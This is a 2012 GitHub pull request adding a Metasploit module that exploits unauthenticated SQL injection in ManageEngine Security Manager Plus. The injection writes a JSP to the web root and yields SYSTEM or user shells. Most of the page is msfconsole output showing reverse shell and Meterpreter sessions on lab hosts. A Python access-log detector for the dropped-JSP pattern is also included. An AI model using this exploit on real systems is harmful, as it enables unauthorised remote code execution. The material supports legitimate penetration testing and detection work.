Add ManageEngine Security Manager AdvanceSearch Module #953

Merged
merged 19 commits into from Oct 27, 2012

Conversation

wchen-r7

Originally based on xistence's Metasploit PoC from Exploit-DB.

This module exploits a SQL injection found in the ManageEngine Security Manager Plus advanced search page. It sends a malicious SQL query to create a JSP file under the web root directory, and then lets it download and execute our malicious executable under the context of SYSTEM. Authentication is not required in order to exploit this vulnerability.

Demo:

msf  exploit(manage_engine_sqli) > show options

Module options (exploit/windows/http/manage_engine_sqli):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        Use a proxy chain
   RHOST       10.0.1.6         yes       The target address
   RPORT       6262             yes       The target port
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   VHOST                        no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.0.1.3         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(manage_engine_sqli) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444 
msf  exploit(manage_engine_sqli) > [*] Serving executable on 0.0.0.0:8080
[*] Server started.
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /hgPw.jsp
[*] 10.0.1.6:2750 - Sending executable (100045 bytes)
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:2751) at 2012-10-23 02:03:11 -0500
[!] 10.0.1.6:6262 - Deleting: hgPw.jsp
[+] 10.0.1.6:6262 - hgPw.jsp deleted

msf  exploit(manage_engine_sqli) >
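The sequence the description above relies on (a request to the search page that writes a JSP under the web root, followed by a request for that JSP, as in the "Sending JSP payload" / "Sending /hgPw.jsp" lines of the demo) leaves a recognisable pair of entries in the web server's access log. The following is an added detection example, not code from this PR or from the Metasploit module: it correlates, per client, a search-page request with a fetch of a previously unknown short, randomly named root-level JSP within a short window. The log lines are constructed, the search endpoint path `/advancedsearch` is an assumed placeholder (the PR does not state the real one), and the allowlist of legitimate root-level JSPs is likewise constructed.

```python
"""Flag the write-then-fetch pattern of a SQLi-dropped JSP in web server access logs."""
import re
from datetime import datetime

# Combined log format parser (constructed regex; adapt to the server's actual format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# ASSUMPTION: the PR does not name the search page's URL; this is a placeholder.
SEARCH_PATH = "/advancedsearch"
# Random short alphabetic names like those the PR demo shows (hgPw.jsp, bFGEaAPS.jsp).
DROPPED_JSP = re.compile(r"^/[A-Za-z]{3,8}\.jsp$")
# Legitimate root-level JSPs to ignore (constructed allowlist; extend for a real install).
KNOWN_ROOT_JSP = {"/index.jsp"}
WINDOW_SECONDS = 30  # how soon after a search request a JSP fetch counts as linked

# Constructed sample log lines (not real traffic): one attack-shaped sequence from
# 10.0.1.3 and ordinary browsing from 10.0.1.9.
SAMPLE_LOG = """\
10.0.1.3 - - [23/Oct/2012:12:43:30 -0500] "POST /advancedsearch HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.1.3 - - [23/Oct/2012:12:43:32 -0500] "GET /bFGEaAPS.jsp HTTP/1.1" 200 0 "-" "Mozilla/4.0"
10.0.1.9 - - [23/Oct/2012:12:50:00 -0500] "GET /advancedsearch?q=router HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.1.9 - - [23/Oct/2012:12:50:03 -0500] "GET /index.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.1.9 - - [23/Oct/2012:13:10:00 -0500] "GET /help.jsp HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_dropped_jsp_fetches(log_text, window=WINDOW_SECONDS):
    """Correlate, per client, a search-page request with a fetch of an unknown
    root-level JSP shortly afterwards. Returns one alert dict per such pair."""
    last_search = {}   # client -> timestamp of its most recent search-page request
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # drop the query string
        if path == SEARCH_PATH:
            last_search[rec["client"]] = rec["ts"]
            continue
        if DROPPED_JSP.match(path) and path not in KNOWN_ROOT_JSP:
            seen = last_search.get(rec["client"])
            if seen is None:
                continue
            delta = (rec["ts"] - seen).total_seconds()
            if 0 <= delta <= window:
                alerts.append({
                    "client": rec["client"],
                    "jsp": path,
                    "status": rec["status"],
                    "seconds_after_search": delta,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_dropped_jsp_fetches(SAMPLE_LOG):
        print(alert)
```

The `/help.jsp` line matches the random-name pattern but falls outside the window, and `/index.jsp` is allowlisted, so only the 10.0.1.3 pair is reported. A 200 on the fetched JSP is the strongest signal: it means the file existed under the web root at that moment, even if the module deleted it afterwards and the sweep of the directory finds nothing.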

jlee-r7 commented Oct 23, 2012

Verified working against current Windows trial installer from ManageEngine running on 2k3.

I don't like the design of having TcpServer serve up the payload. If that's the only way to do it, then fine, but I'd much rather see the payload delivered via the same mechanism as the exploit to improve reliability in the presence of firewalls and other pesky network devices.

@wchen-r7

Done.

Tested on Windows:

msf  exploit(manageengine_search_sqli) > show options

Module options (exploit/multi/http/manageengine_search_sqli):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    10.0.1.6         yes       The target address
   RPORT    6262             yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.0.1.3         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf  exploit(manageengine_search_sqli) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /bFGEaAPS.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:1927) at 2012-10-23 12:43:37 -0500
[!] 10.0.1.6:6262 - Deleting: bFGEaAPS.jsp
[+] 10.0.1.6:6262 - bFGEaAPS.jsp deleted

meterpreter >

New Linux target:

msf  exploit(manageengine_search_sqli) > show options

Module options (exploit/multi/http/manageengine_search_sqli):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    10.0.1.5         yes       The target address
   RPORT    6262             yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.1.3         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf  exploit(manageengine_search_sqli) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /rzae.jsp
[*] Command shell session 1 opened (10.0.1.3:4444 -> 10.0.1.5:38141) at 2012-10-23 12:45:10 -0500
[!] Meterpreter not used. Please manually remove rzae.jsp

id
uid=1000(sinn3r) gid=1000(sinn3r) groups=1000(sinn3r),4(adm),20(dialout),24(cdrom),46(plugdev),111(lpadmin),119(admin),122(sambashare

Inline review comment on generate_jsp_payload:

# Embeds our executable in JSP
#
def generate_jsp_payload
  my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']

no longer needed

@wchen-r7

Examples demonstrating how the new cleanup function operates with different payloads:

Using windows/meterpreter/reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /GzfaOp.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 9 opened (10.0.1.3:4444 -> 10.0.1.6:3501) at 2012-10-23 13:48:27 -0500
[!] 10.0.1.6:6262 - Deleting: GzfaOp.jsp
[+] 10.0.1.6:6262 - GzfaOp.jsp deleted

Using windows/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /xpPDQ.jsp
[*] Command shell session 13 opened (10.0.1.3:4444 -> 10.0.1.6:3656) at 2012-10-23 13:54:38 -0500
[!] 10.0.1.6:6262 - Deleting: xpPDQ.jsp
[+] 10.0.1.6:6262 - xpPDQ.jsp deleted

Using linux/x86/meterpreter/reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /XQJj.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.1.5
[*] Meterpreter session 15 opened (10.0.1.3:4444 -> 10.0.1.5:38152) at 2012-10-23 13:57:00 -0500
[!] Malicious executable is removed during payload execution
[!] 10.0.1.5:6262 - Deleting: XQJj.jsp
[+] 10.0.1.5:6262 - XQJj.jsp deleted

Using linux/x86/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /NbsKVzCi.jsp
[*] Command shell session 16 opened (10.0.1.3:4444 -> 10.0.1.5:38153) at 2012-10-23 13:57:54 -0500
[!] Malicious executable is removed during payload execution
[!] 10.0.1.5:6262 - Deleting: NbsKVzCi.jsp
[+] 10.0.1.5:6262 - NbsKVzCi.jsp deleted

@wchen-r7

Re-tested the module again after all the above changes. Demo:

Using linux/x86/shell_reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Target selected: Linux
[*] 10.0.1.5:6262 - Trying SQL injection...
[*] 10.0.1.5:6262 - Requesting /srq.jsp
[*] Command shell session 1 opened (10.0.1.3:4444 -> 10.0.1.5:38191) at 2012-10-23 19:48:13 -0500
[!] 10.0.1.5:6262 - Deleting: "DfrNh.txt"
[+] 10.0.1.5:6262 - "DfrNh.txt" deleted
[!] 10.0.1.5:6262 - Deleting: "srq.jsp"
[+] 10.0.1.5:6262 - "srq.jsp" deleted

Using linux/x86/meterpreter/reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Target selected: Linux
[*] 10.0.1.5:6262 - Trying SQL injection...
[*] 10.0.1.5:6262 - Requesting /zSbtqvX.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.1.5
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.5:38192) at 2012-10-23 19:49:31 -0500
[!] 10.0.1.5:6262 - Deleting: "FkZCo.txt"
[+] 10.0.1.5:6262 - "FkZCo.txt" deleted
[!] 10.0.1.5:6262 - Deleting: "zSbtqvX.jsp"
[+] 10.0.1.5:6262 - "zSbtqvX.jsp" deleted

meterpreter >

Using windows/meterpreter/reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Target selected: Windows
[*] 10.0.1.6:6262 - Trying SQL injection...
[*] 10.0.1.6:6262 - Requesting /bZdbQX.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:1719) at 2012-10-23 19:50:50 -0500
[!] 10.0.1.6:6262 - Deleting: "PPocV.txt"
[+] 10.0.1.6:6262 - "PPocV.txt" deleted
[!] 10.0.1.6:6262 - Deleting: "bZdbQX.jsp"
[+] 10.0.1.6:6262 - "bZdbQX.jsp" deleted

meterpreter >

Using windows/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Target selected: Windows
[*] 10.0.1.6:6262 - Trying SQL injection...
[*] 10.0.1.6:6262 - Requesting /XFRF.jsp
[*] Command shell session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1738) at 2012-10-23 19:51:35 -0500
[!] 10.0.1.6:6262 - Deleting: "Hjkwa.txt"
[+] 10.0.1.6:6262 - "Hjkwa.txt" deleted
[!] 10.0.1.6:6262 - Deleting: "XFRF.jsp"
[+] 10.0.1.6:6262 - "XFRF.jsp" deleted

@wchen-r7

I'm sorry, egypt... this code review/testing pace just isn't working out. I'm gonna push. Please file a ticket on redmine if you actually find a bug later.

@wchen-r7 wchen-r7 merged commit 8eb790f into rapid7:master Oct 27, 2012